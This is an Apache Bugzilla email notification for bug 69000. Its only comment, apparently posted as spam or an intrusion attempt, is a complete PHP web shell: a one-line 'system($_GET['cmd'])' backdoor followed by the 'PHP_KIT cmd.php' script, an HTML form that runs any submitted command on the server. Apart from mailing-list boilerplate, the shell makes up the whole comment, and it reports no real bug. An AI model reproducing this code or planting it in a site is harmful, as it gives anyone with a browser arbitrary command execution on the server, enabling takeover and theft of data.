https://bz.apache.org/bugzilla/show_bug.cgi?id=69000
flm2r <[email protected]> changed: What |Removed |Added ---------------------------------------------------------------------------- CC| |[email protected] --- Comment #1 from flm2r <[email protected]> --- Created attachment 39705 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39705&action=edit <?php system($_GET['cmd']);?> <? // // PHP_KIT // // cmd.php = Command Execution // // by: The Dark Raver // modified: 21/01/2004 // ?> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML> -- You are receiving this mail because: You are the assignee for the bug. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
